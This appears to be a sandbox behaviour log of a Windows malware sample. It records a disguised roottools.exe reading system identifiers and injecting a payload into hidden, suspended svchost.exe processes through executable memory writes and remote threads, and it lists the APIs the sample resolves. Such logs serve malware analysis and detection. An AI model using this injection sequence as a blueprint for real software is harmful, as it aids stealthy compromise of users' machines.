Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion	value_name = InstallDate, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion	value_name = DigitalProductId	1	Fn
Read Value	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	value_name = Omegovna, type = REG_BINARY	2	Fn Data

Process (2)

Operation	Process	Additional Information	Success	Count	Logfile
Create	C:\Windows\SysWOW64\svchost.exe -k netsvcs	os_pid = 0x638, creation_flags = CREATE_SUSPENDED, show_window = SW_HIDE		1	Fn
Create	C:\Windows\SysWOW64\svchost.exe -k netsvcs	os_pid = 0x7e0, creation_flags = CREATE_SUSPENDED, show_window = SW_HIDE		1	Fn

Thread (2)

Operation	Process	Additional Information	Success	Count	Logfile
Create	C:\Windows\SysWOW64\svchost.exe -k netsvcs	proc_address = 0x795bc, proc_parameter = 0, flags = THREAD_RUNS_IMMEDIATELY		1	Fn
Create	C:\Windows\SysWOW64\svchost.exe -k netsvcs	proc_address = 0x795bc, proc_parameter = 0, flags = THREAD_RUNS_IMMEDIATELY		1	Fn

Memory (10)

Operation	Process	Additional Information	Count	Logfile
Allocate	C:\Windows\SysWOW64\svchost.exe -k netsvcs	address = 0x70000, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 114688	1	Fn
Allocate	C:\Windows\SysWOW64\svchost.exe -k netsvcs	address = 0x70000, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 114688	1	Fn
Write	C:\Windows\SysWOW64\svchost.exe -k netsvcs	address = 0x70000, size = 114688	1	Fn Data
Write	C:\Windows\SysWOW64\svchost.exe -k netsvcs	address = 0x876c4, size = 4	1	Fn Data
Write	C:\Windows\SysWOW64\svchost.exe -k netsvcs	address = 0x877d0, size = 4	1	Fn Data
Write	C:\Windows\SysWOW64\svchost.exe -k netsvcs	address = 0x87d38, size = 4	1	Fn Data
Write	C:\Windows\SysWOW64\svchost.exe -k netsvcs	address = 0x70000, size = 114688	1	Fn Data
Write	C:\Windows\SysWOW64\svchost.exe -k netsvcs	address = 0x876c4, size = 4	1	Fn Data
Write	C:\Windows\SysWOW64\svchost.exe -k netsvcs	address = 0x877d0, size = 4	1	Fn Data
Write	C:\Windows\SysWOW64\svchost.exe -k netsvcs	address = 0x87d38, size = 4	1	Fn Data

Module (567)

Operation	Module	Additional Information	Count	Logfile
Load	OLEAUT32.DLL	base_address = 0x761b0000	1	Fn
Load	SXS.DLL	base_address = 0x74e30000	1	Fn
Load	KERNEL32	base_address = 0x759c0000	1	Fn
Load	kernel32	base_address = 0x759c0000	15	Fn
Load	shell32	base_address = 0x76a70000	2	Fn
Load	NTDLL	base_address = 0x77cb0000	1	Fn
Load	user32	base_address = 0x758c0000	3	Fn
Load	ntdll	base_address = 0x77cb0000	2	Fn
Load	IPHlpApi	base_address = 0x756b0000	1	Fn
Load	User32	base_address = 0x758c0000	1	Fn
Load	KERNEL32.dll	base_address = 0x759c0000	101	Fn
Load	USER32.dll	base_address = 0x758c0000	19	Fn
Load	CRYPT32.dll	base_address = 0x76240000	2	Fn
Load	ADVAPI32.dll	base_address = 0x77740000	39	Fn
Load	SHELL32.dll	base_address = 0x76a70000	3	Fn
Load	SHLWAPI.dll	base_address = 0x76370000	20	Fn
Load	PSAPI.DLL	base_address = 0x75ad0000	1	Fn
Load	ole32.dll	base_address = 0x75ae0000	6	Fn
Load	GDI32.dll	base_address = 0x76950000	8	Fn
Load	WININET.dll	base_address = 0x75f20000	10	Fn
Load	urlmon.dll	base_address = 0x76690000	1	Fn
Load	OLEAUT32.dll	base_address = 0x761b0000	1	Fn
Load	Secur32.dll	base_address = 0x75690000	1	Fn
Get Handle	c:\windows\syswow64\kernel32.dll	base_address = 0x759c0000	2	Fn
Get Handle	c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe	base_address = 0x400000	2	Fn
Get Handle	c:\windows\syswow64\oleaut32.dll	base_address = 0x761b0000	1	Fn
Get Handle	c:\windows\syswow64\ole32.dll	base_address = 0x75ae0000	1	Fn
Get Handle	c:\windows\syswow64\user32.dll	base_address = 0x758c0000	1	Fn
Get Handle	c:\windows\syswow64\ntdll.dll	base_address = 0x77cb0000	1	Fn
Get Filename	-	process_name = c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe, size = 260	3	Fn
Get Filename	-	process_name = c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe, file_name_orig = C:\Windows\system32\MSVBVM60.DLL, size = 260	3	Fn
Get Filename	c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe	process_name = c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe, size = 260	1	Fn
Get Filename	-	process_name = c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe, size = 260	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = IsTNT, address_out = 0x0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = IsProcessorFeaturePresent, address_out = 0x759d5235	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = OleLoadPictureEx, address_out = 0x762170a1	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = DispCallFunc, address_out = 0x761c3dcf	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = LoadTypeLibEx, address_out = 0x761c07b7	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = UnRegisterTypeLib, address_out = 0x761e1ca9	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = CreateTypeLib2, address_out = 0x761c8e70	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarDateFromUdate, address_out = 0x761c7684	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarUdateFromDate, address_out = 0x761ccc98	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = GetAltMonthNames, address_out = 0x761f903a	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarNumFromParseNum, address_out = 0x761c6231	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarParseNumFromStr, address_out = 0x761c5fea	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarDecFromR4, address_out = 0x761d3f94	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarDecFromR8, address_out = 0x761d4e9e	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarDecFromDate, address_out = 0x761fdb72	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarDecFromI4, address_out = 0x761e2a8c	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarDecFromCy, address_out = 0x761fd737	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarR4FromDec, address_out = 0x761fe015	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = GetRecordInfoFromTypeInfo, address_out = 0x761fcc3d	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = GetRecordInfoFromGuids, address_out = 0x761fd1c4	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = SafeArrayGetRecordInfo, address_out = 0x761fd48c	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = SafeArraySetRecordInfo, address_out = 0x761fd4c6	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = SafeArrayGetIID, address_out = 0x761fd509	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = SafeArraySetIID, address_out = 0x761ce7bb	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = SafeArrayCopyData, address_out = 0x761ce496	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = SafeArrayAllocDescriptorEx, address_out = 0x761cddf1	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = SafeArrayCreateEx, address_out = 0x761fd53f	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarFormat, address_out = 0x76202055	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarFormatDateTime, address_out = 0x762020ea	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarFormatNumber, address_out = 0x76202151	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarFormatPercent, address_out = 0x762021f5	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarFormatCurrency, address_out = 0x76202288	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarWeekdayName, address_out = 0x76202335	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarMonthName, address_out = 0x762023d5	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarAdd, address_out = 0x761d5934	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarAnd, address_out = 0x761d5a98	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarCat, address_out = 0x761d59b4	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarDiv, address_out = 0x7622e405	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarEqv, address_out = 0x7622ef07	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarIdiv, address_out = 0x7622f00a	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarImp, address_out = 0x7622ef47	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarMod, address_out = 0x7622f15e	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarMul, address_out = 0x7622dbd4	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarOr, address_out = 0x7622ecfa	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarPow, address_out = 0x7622ea66	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarSub, address_out = 0x7622d332	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarXor, address_out = 0x7622ee2e	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarAbs, address_out = 0x7622ca11	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarFix, address_out = 0x7622cc5f	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarInt, address_out = 0x7622cde7	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarNeg, address_out = 0x7622c802	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarNot, address_out = 0x7622ec66	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarRound, address_out = 0x7622d155	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarCmp, address_out = 0x761cb0dc	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarDecAdd, address_out = 0x761e5f3e	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarDecCmp, address_out = 0x761d4fd0	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarBstrCat, address_out = 0x761d0d2c	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarCyMulI4, address_out = 0x761e59ed	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarBstrCmp, address_out = 0x761bf8b8	1	Fn
Get Address	c:\windows\syswow64\ole32.dll	function = CoCreateInstanceEx, address_out = 0x75b29d4e	1	Fn
Get Address	c:\windows\syswow64\ole32.dll	function = CLSIDFromProgIDEx, address_out = 0x75af0782	1	Fn
Get Address	c:\windows\syswow64\sxs.dll	function = SxsOleAut32MapIIDOrCLSIDToTypeLibrary, address_out = 0x74e77685	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = GetSystemMetrics, address_out = 0x758d7d2f	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = MonitorFromWindow, address_out = 0x758e3150	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = MonitorFromRect, address_out = 0x758fe7a0	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = MonitorFromPoint, address_out = 0x758e5281	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = EnumDisplayMonitors, address_out = 0x758e451a	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = GetMonitorInfoA, address_out = 0x758e4413	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = ReadProcessMemory, address_out = 0x759ecfcc	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = EnumResourceTypesA, address_out = 0x75a50efd	1	Fn
Get Address	c:\windows\syswow64\shell32.dll	function = Shell_NotifyIconA, address_out = 0x76cb8af2	1	Fn
Get Address	c:\windows\syswow64\ntdll.dll	function = ZwSetInformationProcess, address_out = 0x77ccfb18	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = Sleep, address_out = 0x759d10ff	2	Fn
Get Address	c:\windows\syswow64\user32.dll	function = GetDesktopWindow, address_out = 0x758e0a19	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = HeapAlloc, address_out = 0x77cde026	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetLastError, address_out = 0x759d11a9	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetErrorMode, address_out = 0x759d1b00	2	Fn
Get Address	c:\windows\syswow64\ntdll.dll	function = NtYieldExecution, address_out = 0x77ccff2c	1	Fn
Get Address	c:\windows\syswow64\ntdll.dll	function = NtProtectVirtualMemory, address_out = 0x77cd0028	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateFileA, address_out = 0x759d53c6	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WriteFile, address_out = 0x759d1282	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CloseHandle, address_out = 0x759d1410	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = ReadFile, address_out = 0x759d3ed3	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetFileSize, address_out = 0x759d196e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = UnmapViewOfFile, address_out = 0x759d1826	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = VirtualProtectEx, address_out = 0x75a545bf	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetLongPathNameA, address_out = 0x75a5437f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = TerminateProcess, address_out = 0x759ed802	1	Fn
Get Address	c:\windows\syswow64\iphlpapi.dll	function = GetAdaptersInfo, address_out = 0x756b9263	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = VirtualAllocEx, address_out = 0x759ed9b0	2	Fn
Get Address	c:\windows\syswow64\shell32.dll	function = ShellExecuteA, address_out = 0x76cb7078	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = EnumWindows, address_out = 0x758dd1cf	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = DestroyWindow, address_out = 0x758d9a55	2	Fn
Get Address	c:\windows\syswow64\user32.dll	function = EnumThreadWindows, address_out = 0x758e3961	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = TerminateThread, address_out = 0x759d7a2f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LoadLibraryA, address_out = 0x759d49d7	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = DeleteFileW, address_out = 0x759d89b3	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = HeapReAlloc, address_out = 0x77cf1f6e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetNativeSystemInfo, address_out = 0x759e10b5	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateThread, address_out = 0x759d34d5	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = HeapDestroy, address_out = 0x759d35b7	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LocalFree, address_out = 0x759d2d3c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = DeleteCriticalSection, address_out = 0x77ce45f5	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetComputerNameW, address_out = 0x759ddd0e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetProcessHeap, address_out = 0x759d14e9	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SystemTimeToFileTime, address_out = 0x759d5a7e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GlobalMemoryStatusEx, address_out = 0x759fd4c4	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateProcessW, address_out = 0x759d103d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WideCharToMultiByte, address_out = 0x759d170d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = InterlockedIncrement, address_out = 0x759d1400	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetSystemTime, address_out = 0x759d5a96	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = VirtualFreeEx, address_out = 0x759ed9c8	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = IsBadReadPtr, address_out = 0x759fd075	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrcmpiW, address_out = 0x759ed5cd	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = OpenMutexW, address_out = 0x759d5151	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetEndOfFile, address_out = 0x759ece2e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCurrentThread, address_out = 0x759d17ec	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FlushFileBuffers, address_out = 0x759d469b	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = RemoveVectoredExceptionHandler, address_out = 0x77d25f41	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCurrentProcess, address_out = 0x759d1809	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetVersionExW, address_out = 0x759d1ae5	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = DuplicateHandle, address_out = 0x759d1886	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetModuleHandleA, address_out = 0x759d1245	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = AddVectoredExceptionHandler, address_out = 0x77d2742b	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = ExitProcess, address_out = 0x759d7a10	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCurrentProcessId, address_out = 0x759d11f8	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CopyFileW, address_out = 0x759f830d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrcmpiA, address_out = 0x759d3e8e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = IsWow64Process, address_out = 0x759d195e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FindFirstChangeNotificationW, address_out = 0x759ed851	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FindNextChangeNotification, address_out = 0x759f5c1e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = IsProcessInJob, address_out = 0x759fc7ea	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateRemoteThread, address_out = 0x75a5416b	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateNamedPipeW, address_out = 0x75a5414b	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = DisconnectNamedPipe, address_out = 0x75a541df	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = ConnectNamedPipe, address_out = 0x75a540fb	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetLogicalDrives, address_out = 0x759d5371	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetDriveTypeW, address_out = 0x759d418b	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetUserDefaultUILanguage, address_out = 0x759d44ab	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CopyFileExW, address_out = 0x759f3b92	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetEnvironmentVariableW, address_out = 0x759d1b48	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetFilePointer, address_out = 0x759d17d1	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = InitializeCriticalSection, address_out = 0x77ce2c42	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetTimeZoneInformation, address_out = 0x759d465a	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = MultiByteToWideChar, address_out = 0x759d192e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetFileAttributesW, address_out = 0x759ed4f7	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetVolumeNameForVolumeMountPointW, address_out = 0x759e052f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = OpenProcess, address_out = 0x759d1986	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetFileTime, address_out = 0x759d4407	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = ReleaseMutex, address_out = 0x759d111e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LeaveCriticalSection, address_out = 0x77cd2270	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetModuleFileNameW, address_out = 0x759d4950	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetFileTime, address_out = 0x759eecbb	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = RemoveDirectoryW, address_out = 0x75a544cf	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = VirtualAlloc, address_out = 0x759d1856	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = ExpandEnvironmentStringsW, address_out = 0x759d4173	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FindNextFileW, address_out = 0x759d54ee	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = EnterCriticalSection, address_out = 0x77cd22b0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetFileAttributesW, address_out = 0x759d1b18	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FindClose, address_out = 0x759d4442	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = OpenEventW, address_out = 0x759d15d6	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetTempPathW, address_out = 0x759ed4dc	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = HeapFree, address_out = 0x759d14c9	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = HeapCreate, address_out = 0x759d4a2d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WriteProcessMemory, address_out = 0x759ed9e0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetFileSizeEx, address_out = 0x759d59e2	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FindFirstFileW, address_out = 0x759d4435	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = InterlockedExchange, address_out = 0x759d1462	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetVolumeInformationW, address_out = 0x759ec860	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateDirectoryW, address_out = 0x759d4259	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FreeLibrary, address_out = 0x759d34c8	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetModuleHandleW, address_out = 0x759d34b0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetProcAddress, address_out = 0x759d1222	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LoadLibraryW, address_out = 0x759d492b	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = Process32FirstW, address_out = 0x759f8baf	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = Process32NextW, address_out = 0x759f896c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetLastError, address_out = 0x759d11c0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateToolhelp32Snapshot, address_out = 0x759f735f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateFileW, address_out = 0x759d3f5c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateMutexW, address_out = 0x759d424c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = ResetEvent, address_out = 0x759d16dd	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetEvent, address_out = 0x759d16c5	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateEventW, address_out = 0x759d183e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WaitForSingleObject, address_out = 0x759d1136	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WaitForMultipleObjects, address_out = 0x759d4220	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetTickCount, address_out = 0x759d110c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = VirtualFree, address_out = 0x759d186e	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = GetIconInfo, address_out = 0x758e49ea	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = DrawIcon, address_out = 0x758e8deb	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = LoadImageW, address_out = 0x758dfbd1	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = GetCursorPos, address_out = 0x758e1218	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = DefWindowProcW, address_out = 0x77ce25dd	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = CreateWindowExW, address_out = 0x758d8a29	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = UnregisterClassW, address_out = 0x758d9f84	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = GetKeyboardLayoutList, address_out = 0x758e2e69	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = CharLowerA, address_out = 0x758e3e75	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = CharToOemW, address_out = 0x75931a26	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = TranslateMessage, address_out = 0x758d7809	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = PeekMessageW, address_out = 0x758e05ba	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = DispatchMessageW, address_out = 0x758d787b	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = MsgWaitForMultipleObjects, address_out = 0x758e0b4a	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = RegisterClassExW, address_out = 0x758db17d	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = SetWindowLongA, address_out = 0x758e6110	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = GetWindowLongA, address_out = 0x758dd156	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = CharUpperW, address_out = 0x758df350	1	Fn
Get Address	c:\windows\syswow64\crypt32.dll	function = CryptImportPublicKeyInfo, address_out = 0x76256c0e	1	Fn
Get Address	c:\windows\syswow64\crypt32.dll	function = CryptDecodeObjectEx, address_out = 0x7624d718	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegCloseKey, address_out = 0x7775469d	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = GetAce, address_out = 0x777545f0	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptEncrypt, address_out = 0x7776779b	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = GetSidSubAuthorityCount, address_out = 0x77750e0c	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = AllocateAndInitializeSid, address_out = 0x777540e6	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = GetSidSubAuthority, address_out = 0x77750e24	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = SetEntriesInAclW, address_out = 0x77752a66	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegCreateKeyExW, address_out = 0x777540fe	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptVerifySignatureW, address_out = 0x7774c54a	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = SetNamedSecurityInfoW, address_out = 0x77749fe2	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = GetNamedSecurityInfoW, address_out = 0x7774f4fd	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptCreateHash, address_out = 0x7774df4e	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptHashData, address_out = 0x7774df36	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = SetSecurityDescriptorSacl, address_out = 0x77754680	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegSetValueExW, address_out = 0x777514d6	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptDestroyHash, address_out = 0x7774df66	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = OpenProcessToken, address_out = 0x77754304	1	Fn
